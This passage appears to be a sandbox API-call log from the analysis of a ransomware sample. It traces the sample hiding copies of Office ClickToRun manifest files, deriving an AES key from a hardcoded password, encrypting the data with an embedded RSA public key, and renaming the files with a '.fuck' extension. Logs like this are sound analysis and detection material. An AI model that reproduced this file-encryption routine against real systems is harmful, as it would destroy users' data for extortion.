KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.175] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.175] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aa9e0) returned 1 [0239.176] CryptImportPublicKeyInfo (in: hCryptProv=0x28aa9e0, dwCertEncodingType=0x1, pInfo=0x2895be0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2895c10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2895c18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894770) returned 1 [0239.176] CryptEncrypt (in: hKey=0x2894770, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.176] CryptEncrypt (in: hKey=0x2894770, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa408*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aa408*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.176] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aa408, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.176] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.176] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.176] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.176] CloseHandle (hObject=0xffffffff) returned 1 [0239.176] CloseHandle (hObject=0xffffffff) returned 1 [0239.176] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.176] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.177] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.177] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.177] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.178] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.178] CryptReleaseContext (hProv=0x28aaa68, dwFlags=0x0) returned 1 [0239.178] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.178] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.178] GetLastError () returned 0x5 [0239.178] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml")) returned 0x20 [0239.178] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.178] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.179] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.179] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.179] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab0c8) returned 1 [0239.181] CryptCreateHash (in: hProv=0x28ab0c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.181] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.181] CryptHashData (hHash=0x2893b70, pbData=0x2884e68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.181] CryptDeriveKey (in: hProv=0x28ab0c8, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.181] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.181] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.181] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aa490) returned 1 [0239.182] CryptImportPublicKeyInfo (in: hCryptProv=0x28aa490, dwCertEncodingType=0x1, pInfo=0x2895cb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2895ce0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2895ce8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28947f0) returned 1 [0239.182] CryptEncrypt (in: hKey=0x28947f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.182] CryptEncrypt (in: hKey=0x28947f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa270*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aa270*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.182] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aa270, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.182] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.182] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.182] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.182] CloseHandle (hObject=0xffffffff) returned 1 [0239.182] CloseHandle (hObject=0xffffffff) returned 1 [0239.182] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.183] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.183] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml.gsg")) returned 0 [0239.184] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml.fuck")) returned 0 [0239.184] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.184] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.184] CryptReleaseContext (hProv=0x28ab0c8, dwFlags=0x0) returned 1 [0239.184] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.184] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.184] GetLastError () returned 0x5 [0239.185] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml")) returned 0x20 [0239.185] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.185] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.185] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.186] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.186] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa2f8) returned 1 [0239.188] CryptCreateHash (in: hProv=0x28aa2f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.188] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.188] CryptHashData (hHash=0x2893fb0, pbData=0x2885110, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.188] CryptDeriveKey (in: hProv=0x28aa2f8, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.188] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.188] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.188] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aaea8) returned 1 [0239.189] CryptImportPublicKeyInfo (in: hCryptProv=0x28aaea8, dwCertEncodingType=0x1, pInfo=0x2896260*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896290*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896298*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894830) returned 1 [0239.189] CryptEncrypt (in: hKey=0x2894830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.189] CryptEncrypt (in: hKey=0x2894830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab040*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ab040*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.189] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ab040, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.189] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.189] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.189] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.189] CloseHandle (hObject=0xffffffff) returned 1 [0239.189] CloseHandle (hObject=0xffffffff) returned 1 [0239.189] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.190] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.190] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.190] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.191] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.191] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.191] CryptReleaseContext (hProv=0x28aa2f8, dwFlags=0x0) returned 1 [0239.191] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.191] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.191] GetLastError () returned 0x5 [0239.191] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml")) returned 0x20 [0239.191] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.192] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.192] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.192] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.193] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab1d8) returned 1 [0239.195] CryptCreateHash (in: hProv=0x28ab1d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.195] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.195] CryptHashData (hHash=0x2893af0, pbData=0x2884a58, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.195] CryptDeriveKey (in: hProv=0x28ab1d8, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.195] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.195] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.195] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab0c8) returned 1 [0239.195] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab0c8, dwCertEncodingType=0x1, pInfo=0x2896330*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896360*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896368*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894330) returned 1 [0239.195] CryptEncrypt (in: hKey=0x2894330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.196] CryptEncrypt (in: hKey=0x2894330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa2f8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aa2f8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.196] WriteFile (in: 